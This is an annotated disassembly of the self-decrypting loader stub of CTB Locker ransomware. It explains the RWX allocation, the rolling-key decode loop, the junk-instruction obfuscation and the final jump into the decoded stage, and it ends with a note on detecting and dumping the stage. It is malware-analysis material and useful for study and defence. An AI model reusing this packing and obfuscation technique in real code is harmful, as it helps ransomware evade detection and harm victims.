.text:004028D6 DecodageProc:                           ; CODE XREF: .text:00401483
.text:004028D6                                         ; DATA XREF: .text:00402E11
.text:004028D6                                         ; Decoding routine for the real CTB Locker payload (self-decrypting stub).
.text:004028D6                                         ; Flow: VirtualAlloc an RWX buffer -> decode 0x674 bytes dword by dword -> JMP into the buffer.
.text:004028D6                                         ; Register roles (32-bit, stdcall callee cleans the VirtualAlloc args):
.text:004028D6                                         ;   EDX = source pointer (unk_4055B7), +4 per iteration
.text:004028D6                                         ;   EDI = bytes remaining (0x674 at start), -4 per iteration
.text:004028D6                                         ;   ECX = rolling key, 0x37497531 initially; key = rol(decoded dword, 8) after each dword
.text:004028D6                                         ;   EBX = destination pointer into the allocated buffer
.text:004028D6                                         ;   EAX = dword being decoded: out = ((~in) - 0x19) ^ key + 1
.text:004028D6                                         ;   ESI = scratch used only by the interleaved junk instructions
.text:004028D6                                         ; API arguments are built as differences of two constants, so 0x40/0x1000/0x674 never appear as literal immediates.
.text:004028D6                 xor     edx, edx
.text:004028D8                 sub     edx, offset unk_4055B7 ; EDX = start of the region to decode (0 - off, negated below)
.text:004028DE                 neg     edx
.text:004028E0                 sub     edi, edi
.text:004028E2                 xor     edi, 674h       ; EDI = 0x674 = byte count to decode
.text:004028E8                 mov     ecx, 37497531h  ; ECX = initial decoding key
.text:004028E8                                         ; ========== VirtualAlloc ( NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ==========
.text:004028ED                 push    ecx             ; save ECX and EDX on the stack (both are volatile across the call)
.text:004028EE                 push    edx
.text:004028EF                 mov     ebx, 5F88252Bh
.text:004028F4                 sub     ebx, 5F8824EBh
.text:004028FA                 push    ebx             ; EBX = 0x40, i.e. flProtect = PAGE_EXECUTE_READWRITE
.text:004028FB                 mov     ebx, 5F8834EBh
.text:00402900                 sub     ebx, 5F8824EBh
.text:00402906                 push    ebx             ; EBX = 0x1000, i.e. flAllocationType = MEM_COMMIT
.text:00402907                 mov     ebx, 5F882B5Fh
.text:0040290C                 sub     ebx, 5F8824EBh
.text:00402912                 push    ebx             ; EBX = 0x674, i.e. dwSize = 0x674
.text:00402913                 mov     edx, 0
.text:00402918                 push    edx             ; lpAddress = NULL, let the system choose where to map the memory
.text:00402919                 call    ds:VirtualAlloc
.text:0040291F                 pop     edx             ; restore EDX and ECX saved above
.text:00402920                 pop     ecx             ; ECX = 0x37497531
.text:00402921                 test    eax, eax
.text:00402923                 jz      endProc         ; allocation failed -> bail out (endProc is outside this listing)
.text:00402929                 lea     ebx, [eax]      ; otherwise EBX = base of the allocated pages (same as mov ebx, eax)
.text:0040292B                 push    ebx             ; keep the buffer address on the stack; it is fetched back via ESP and jumped to after decoding
.text:0040292C
.text:0040292C loc_40292C:                             ; CODE XREF: .text:00402DAE
.text:0040292C                 mov     byte ptr dword_4070DD, 7Dh ; junk/obfuscation: the ESI ops and stores into 0x407000-0x4071FF in this loop never touch EAX/EBX/ECX/EDX/EDI
.text:00402933                 sbb     dword ptr byte_407127, esi
.text:00402939                 mov     esi, dword ptr unk_40703E
.text:0040293F                 mov     byte ptr dword_40716B, 1Bh
.text:00402946                 mov     esi, dword_407142+2
.text:0040294C                 sbb     esi, esi        ; ESI = -CF (0 or -1); scratch only
.text:0040294E                 sbb     dword_40705A+1, esi
.text:00402954                 sbb     dword ptr unk_4070A0, esi
.text:0040295A                 mov     esi, dword_40716B+2
.text:00402960                 mov     byte ptr dword_40712A, 89h
.text:00402967                 sbb     esi, esi
.text:00402969                 add     dword_4070FD+2, esi
.text:0040296F                 sub     dword_407076+1, esi
.text:00402975                 mov     byte_40709C, 0B6h
.text:0040297C                 mov     esi, dword ptr unk_4070A6
.text:00402982                 adc     esi, 0FFFFFFAAh
.text:00402985                 mov     esi, dword_407174+1
.text:0040298B                 xor     eax, eax        ; EAX = 0
.text:0040298D                 xor     eax, [edx]      ; EAX = next 4 encoded bytes at EDX
.text:0040298F                 mov     byte ptr dword_4070FD, 40h
.text:00402996                 adc     dword ptr byte_4070E8, esi
.text:0040299C                 mov     byte ptr dword_40706A+1, 0DAh
.text:004029A3                 or      dword_4070C7, esi
.text:004029A9                 add     dword ptr unk_40712E, esi
.text:004029AF                 add     esi, esi
.text:004029B1                 add     esi, esi
.text:004029B3                 mov     byte ptr dword_407158, 11h
.text:004029BA                 sbb     dword ptr unk_4071A6, esi
.text:004029C0                 and     esi, 0FFFFFFA3h
.text:004029C3                 sbb     dword_407055, esi
.text:004029C9                 add     esi, esi
.text:004029CB                 sbb     esi, esi
.text:004029CD                 and     dword_40710A+1, esi
.text:004029D3                 sub     esi, 5Ch
.text:004029D6                 adc     dword_407166+3, esi
.text:004029DC                 adc     dword ptr byte_407017, esi
.text:004029E2                 mov     esi, dword_40716B+2
.text:004029E8                 lea     edx, [edx+4]                                         ; EDX += 4: advance to the next source dword (LEA leaves flags alone)
.text:004029EB                 or      esi, 21h
.text:004029EE                 mov     byte ptr dword_40718D+1, 0B3h
.text:004029F5                 mov     byte ptr dword_407130+2, 0A6h
.text:004029FC                 mov     byte_4071A8, 0B0h
.text:00402A03                 add     dword_40706A+3, esi
.text:00402A09                 and     esi, 3Ch
.text:00402A0C                 mov     dword_407076, esi
.text:00402A12                 mov     esi, dword_407086+2
.text:00402A18                 mov     byte_407101, 69h
.text:00402A1F                 or      esi, 0FFFFFF86h
.text:00402A22                 or      esi, 0FFFFFFDAh
.text:00402A25                 mov     esi, dword_407000
.text:00402A2B                 sbb     esi, esi
.text:00402A2D                 add     esi, esi
.text:00402A2F                 adc     dword_407051, esi
.text:00402A35                 not     eax                                                   ; step 1: EAX = ~EAX
.text:00402A37                 mov     esi, dword_40701E
.text:00402A3D                 mov     dword_407035+1, esi
.text:00402A43                 mov     esi, dword_407170
.text:00402A49                 mov     esi, dword_407091
.text:00402A4F                 mov     byte ptr unk_4071C1, 98h
.text:00402A56                 sbb     esi, 0FFFFFFF8h
.text:00402A59                 sbb     esi, 0FFFFFFE3h
.text:00402A5C                 mov     esi, dword_40716B+2
.text:00402A62                 add     esi, esi
.text:00402A64                 mov     byte ptr dword_407170+1, 9Dh
.text:00402A6B                 and     esi, 0FFFFFFCEh
.text:00402A6E                 sub     esi, esi
.text:00402A70                 or      esi, 73h
.text:00402A73                 add     esi, esi
.text:00402A75                 mov     esi, dword ptr byte_4071CB
.text:00402A7B                 clc                                                           ; CF = 0 so the ADC below is a plain ADD (the junk above left CF undefined)
.text:00402A7C                 adc     eax, 0FFFFFFE7h                                        ; step 2: EAX = EAX + 0xFFFFFFE7 = EAX - 0x19
.text:00402A7F                 mov     esi, dword_40705A+2
.text:00402A85                 adc     dword ptr byte_407181, esi
.text:00402A8B                 mov     esi, dword_407142
.text:00402A91                 mov     byte ptr dword_407166, 5Ch
.text:00402A98                 mov     byte_4070F3, 1Eh
.text:00402A9F                 add     esi, esi
.text:00402AA1                 sub     esi, 7Ch
.text:00402AA4                 mov     esi, dword_4070D7+2
.text:00402AAA                 sub     esi, esi
.text:00402AAC                 mov     byte ptr dword_4070B7+3, 0C5h
.text:00402AB3                 or      esi, 1Ch
.text:00402AB6                 adc     esi, esi
.text:00402AB8                 mov     byte ptr unk_4071E7, 0ABh
.text:00402ABF                 mov     esi, dword ptr byte_40709D
.text:00402AC5                 sbb     dword_407005+3, esi
.text:00402ACB                 mov     esi, dword ptr unk_407068
.text:00402AD1                 mov     esi, dword_4071D5+1
.text:00402AD7                 xor     dword ptr unk_4071DF, esi
.text:00402ADD                 mov     esi, dword_407105+2
.text:00402AE3                 xor     eax, ecx                                               ; step 3: EAX ^= ECX (current key)
.text:00402AE5                 xor     esi, 0FFFFFFDBh
.text:00402AE8                 mov     esi, dword_407051+3
.text:00402AEE                 add     esi, 8
.text:00402AF1                 add     esi, 7
.text:00402AF4                 mov     esi, dword_40704C+2
.text:00402AFA                 add     esi, esi
.text:00402AFC                 mov     byte ptr dword_4070A1, 87h
.text:00402B03                 mov     esi, dword_40710A+3
.text:00402B09                 adc     esi, esi
.text:00402B0B                 sbb     esi, esi
.text:00402B0D                 mov     esi, dword_407055
.text:00402B13                 xor     esi, 70h
.text:00402B16                 mov     byte ptr dword_40706A, 48h
.text:00402B1D                 mov     byte ptr dword_4070AC+3, 9Ch
.text:00402B24                 mov     dword_407188+1, esi
.text:00402B2A                 mov     esi, dword_40713E+2
.text:00402B30                 and     esi, 31h
.text:00402B33                 xor     esi, 3Dh
.text:00402B36                 sbb     dword ptr unk_407156, esi
.text:00402B3C                 or      dword ptr byte_407101, esi
.text:00402B42                 inc     eax                                                    ; step 4: EAX += 1 -> EAX is now the decoded dword
.text:00402B43                 mov     byte_4070E6, 9
.text:00402B4A                 xor     esi, esi
.text:00402B4C                 add     esi, esi
.text:00402B4E                 or      esi, 1Ch
.text:00402B51                 and     esi, 0FFFFFFC2h
.text:00402B54                 adc     esi, esi
.text:00402B56                 mov     byte ptr dword_40702D+1, 76h
.text:00402B5D                 mov     esi, dword ptr byte_4070CF
.text:00402B63                 mov     byte ptr dword_4071FB, 79h
.text:00402B6A                 mov     byte ptr unk_4070B0, 60h
.text:00402B71                 or      dword ptr unk_4071F0, esi
.text:00402B77                 mov     byte_407182, 19h
.text:00402B7E                 sbb     dword ptr unk_4071F8, esi
.text:00402B84                 add     esi, 47h
.text:00402B87                 sbb     esi, esi
.text:00402B89                 mov     byte ptr dword_407134+3, 0E8h
.text:00402B90                 mov     byte ptr dword_40719E, 85h
.text:00402B97                 push    eax                                                    ; ECX = EAX (via the stack): the decoded dword becomes the key for the next 4 bytes
.text:00402B98                 pop     ecx
.text:00402B99                 sub     esi, 0FFFFFFCCh
.text:00402B9C                 mov     byte ptr dword_407080+1, 9
.text:00402BA3                 mov     esi, dword_40704C+3
.text:00402BA9                 mov     esi, dword ptr byte_4070F2
.text:00402BAF                 mov     dword_4070AC+2, esi
.text:00402BB5                 adc     dword ptr byte_4070F1, esi
.text:00402BBB                 add     esi, esi
.text:00402BBD                 mov     esi, dword_407138+1
.text:00402BC3                 mov     esi, dword_4071B3+3
.text:00402BC9                 mov     byte_4070C2, 45h
.text:00402BD0                 sbb     dword_407063+3, esi
.text:00402BD6                 add     esi, esi
.text:00402BD8                 mov     esi, dword_4071C7+3
.text:00402BDE                 xor     esi, esi
.text:00402BE0                 and     dword ptr unk_407067, esi
.text:00402BE6                 add     dword ptr byte_40709F, esi
.text:00402BEC                 or      dword_40719A+2, esi
.text:00402BF2                 rol     ecx, 1                                                 ; rotate the key left by 1 bit...
.text:00402BF4                 xor     esi, esi
.text:00402BF6                 or      esi, 0FFFFFF85h
.text:00402BF9                 xor     esi, 0FFFFFFF2h
.text:00402BFC                 add     esi, esi
.text:00402BFE                 or      dword ptr byte_4071A8, esi
.text:00402C04                 mov     esi, dword ptr unk_4071E4
.text:00402C0A                 and     dword ptr unk_4071ED, esi
.text:00402C10                 and     esi, 48h
.text:00402C13                 add     esi, esi
.text:00402C15                 mov     esi, dword_4070A7+1
.text:00402C1B                 adc     esi, 0FFFFFFB1h
.text:00402C1E                 mov     byte ptr dword_40717A, 25h
.text:00402C25                 mov     byte ptr dword_4071FB, 3Ah
.text:00402C2C                 sub     dword ptr byte_40703F, esi
.text:00402C32                 mov     byte_407059, 85h
.text:00402C39                 or      esi, 0FFFFFFDAh
.text:00402C3C                 sbb     esi, 0FFFFFFC8h
.text:00402C3F                 or      dword_407170+1, esi
.text:00402C45                 mov     byte ptr dword_4071D5+1, 29h
.text:00402C4C                 rol     ecx, 7                                                 ; ...then 7 more bits: key = rol(decoded dword, 8) in total
.text:00402C4F                 sbb     esi, 3Fh
.text:00402C52                 adc     esi, esi
.text:00402C54                 add     esi, esi
.text:00402C56                 adc     esi, esi
.text:00402C58                 xor     esi, esi
.text:00402C5A                 mov     esi, dword_407055+1
.text:00402C60                 mov     byte ptr unk_407015, 93h
.text:00402C67                 mov     byte ptr dword_407184+3, 62h
.text:00402C6E                 mov     byte_407199, 0E2h
.text:00402C75                 mov     esi, dword ptr unk_40713C
.text:00402C7B                 sbb     esi, esi
.text:00402C7D                 xor     esi, 0FFFFFF90h
.text:00402C80                 mov     byte ptr dword_40716B+3, 4Ch
.text:00402C87                 mov     esi, dword_407134+1
.text:00402C8D                 mov     byte_40702A, 0F7h
.text:00402C94                 mov     esi, dword_407174+3
.text:00402C9A                 sub     esi, 0FFFFFFF0h
.text:00402C9D                 mov     esi, dword ptr unk_40711B
.text:00402CA3                 mov     [ebx], eax                                              ; store the decoded dword into the RWX buffer allocated above
.text:00402CA5                 or      esi, 0FFFFFFBEh
.text:00402CA8                 sub     esi, esi
.text:00402CAA                 xor     esi, 61h
.text:00402CAD                 add     esi, 71h
.text:00402CB0                 mov     esi, dword_407035+1
.text:00402CB6                 add     dword_40705A+1, esi
.text:00402CBC                 or      dword_40702D+3, esi
.text:00402CC2                 mov     byte ptr unk_4070FB, 0C5h
.text:00402CC9                 mov     esi, dword_407113
.text:00402CCF                 mov     byte ptr dword_4071A2+1, 68h
.text:00402CD6                 mov     esi, dword_407149+1
.text:00402CDC                 add     esi, esi
.text:00402CDE                 add     esi, 0FFFFFF84h
.text:00402CE1                 adc     esi, esi
.text:00402CE3                 add     esi, 5Dh
.text:00402CE6                 mov     esi, dword_4071C7
.text:00402CEC                 mov     esi, dword_40707B
.text:00402CF2                 add     dword_4071DA+3, esi
.text:00402CF8                 sub     ebx, 0FFFFFFFCh                                         ; EBX += 4 (written as SUB -4): next destination dword
.text:00402CFB                 xor     dword_407158, esi
.text:00402D01                 mov     byte_4071D2, 0CAh
.text:00402D08                 sbb     esi, esi
.text:00402D0A                 or      dword ptr byte_407042, esi
.text:00402D10                 adc     esi, 0FFFFFFABh
.text:00402D13                 mov     byte_40707A, 0F2h
.text:00402D1A                 mov     esi, dword_407117+1
.text:00402D20                 mov     esi, dword ptr byte_4071F6
.text:00402D26                 add     dword_40708D, esi
.text:00402D2C                 mov     esi, dword_4071B3
.text:00402D32                 mov     byte_4071CD, 0CFh
.text:00402D39                 mov     byte_407085, 95h
.text:00402D40                 add     esi, esi
.text:00402D42                 add     esi, 65h
.text:00402D45                 add     esi, esi
.text:00402D47                 mov     esi, dword_4071BD+2
.text:00402D4D                 add     edi, 0FFFFFFFCh                                         ; EDI -= 4: bytes remaining
.text:00402D50                 mov     byte_4071CB, 6Eh
.text:00402D57                 mov     byte ptr dword_4071DA, 2Ch
.text:00402D5E                 sbb     esi, 5Eh
.text:00402D61                 xor     esi, esi
.text:00402D63                 mov     byte ptr dword_40712A+2, 6Ah
.text:00402D6A                 mov     esi, dword_40706E+3
.text:00402D70                 xor     esi, esi
.text:00402D72                 sbb     esi, 0FFFFFFA1h
.text:00402D75                 mov     esi, dword_407194+3
.text:00402D7B                 mov     esi, dword_4070E2+3
.text:00402D81                 mov     esi, dword_40707B+3
.text:00402D87                 mov     esi, dword ptr unk_407153
.text:00402D8D                 sbb     esi, esi
.text:00402D8F                 mov     byte ptr dword_407035, 0E7h
.text:00402D96                 mov     esi, dword_4071AF+3
.text:00402D9C                 add     esi, esi
.text:00402D9E                 mov     byte ptr dword_407142+3, 5
.text:00402DA5                 mov     esi, dword_407000+2
.text:00402DAB                 cmp     edi, 0          ; loop until all 0x674 bytes (413 dwords) are decoded
.text:00402DAE                 <jnz     loc_40292C      ; ===> back to the top of the decoding loop
.text:00402DAE                                         ; (the leading '<' is a listing artifact, not part of the instruction)
.text:00402DB4                 mov     ebx, esp        ; EBX = ESP; [ESP] is the buffer address pushed at 0040292B (the push/pop inside the loop were balanced).
.text:00402DB4                                         ; The final JMP below dereferences EBX to enter the decoded code.
.text:00402DB6                 mov     ecx, ds:GetModuleHandleA
.text:00402DBC                 push    ecx             ; pushes the address of GetModuleHandleA; presumably handed to the decoded stage as its import bootstrap -- not confirmable from this listing
.text:00402DBD                 add     eax, edi        ; EDI == 0 at this point, so EAX (last decoded dword) is unchanged
.text:00402DBF                 xor     edx, ecx        ; junk from here to the JMP: EDX/ESI/EDI/CH/AH churn; ECX and EAX are clobbered after their useful values were pushed/consumed
.text:00402DC1                 adc     esi, esi
.text:00402DC3                 mov     dl, byte ptr dword_4070F6+2
.text:00402DC9                 xor     edx, 0FFFFFFA7h
.text:00402DCC                 and     dword_40712A+3, esi
.text:00402DD2                 sbb     byte_407069, dl
.text:00402DD8                 or      ch, 0B6h        ; clobbers ECX (its value was already pushed above)
.text:00402DDB                 mov     byte_4070F4, 8Dh
.text:00402DE2                 sbb     edi, edx
.text:00402DE4                 and     esi, 4Fh
.text:00402DE7                 add     edi, esi
.text:00402DE9                 mov     esi, dword_4070BB+2
.text:00402DEF                 mov     byte ptr dword_407188+2, 4Fh
.text:00402DF6                 mov     ah, byte ptr dword_407162+2 ; clobbers EAX
.text:00402DFC                 mov     esi, dword_407055+3
.text:00402E02                 mov     byte_407180, 69h
.text:00402E09                 sbb     dword ptr byte_4071D9, ecx
.text:00402E0F                 sub     esi, esi
.text:00402E11                 push    offset DecodageProc ; pushes the address of this routine (loc_4028D6, the decoder with buffer allocation)
.text:00402E11                                             ; The original analyst's guess: a return path for a second decode+execute pass -- unverified.
.text:00402E11                                             ; Stack at the final JMP: [ESP] = DecodageProc, [ESP+4] = &GetModuleHandleA, [ESP+8] = buffer address.
.text:00402E16                 add     edx, edx
.text:00402E18                 mov     eax, dword_40717A+1
.text:00402E1D                 mov     byte ptr dword_4071DA, 0FBh
.text:00402E24                 sbb     dword_40701E, edx
.text:00402E2A                 add     esi, edi
.text:00402E2C                 sbb     eax, 2Ch
.text:00402E2F                 xor     edi, 0FFFFFFF5h
.text:00402E32                 xor     dword ptr unk_40718C, esi
.text:00402E38                 sbb     dword_40710A, edi
.text:00402E3E                 sub     byte ptr unk_407121, ch
.text:00402E44                 mov     edi, dword_4070A7+1
.text:00402E4A                 mov     edx, dword_40710A+1
.text:00402E50                 mov     edi, dword ptr unk_407112
.text:00402E56                 mov     byte_4070B6, 0FDh
.text:00402E5D                 add     edx, 0FFFFFFBDh
.text:00402E60                 mov     byte ptr dword_4071BD+1, 27h
.text:00402E67                 mov     edx, dword_4071AF
.text:00402E6D                 jmp     dword ptr [ebx]     ; ==> transfer control into the decoded code in the buffer allocated at the start.
.text:00402E6D                                             ; Detection/analysis note: VirtualAlloc(PAGE_EXECUTE_READWRITE) -> write loop -> indirect JMP into the
.text:00402E6D                                             ; allocation is the classic self-decrypting-stub pattern; a breakpoint here lets the 0x674-byte
.text:00402E6D                                             ; decoded stage be dumped from the buffer before it runs.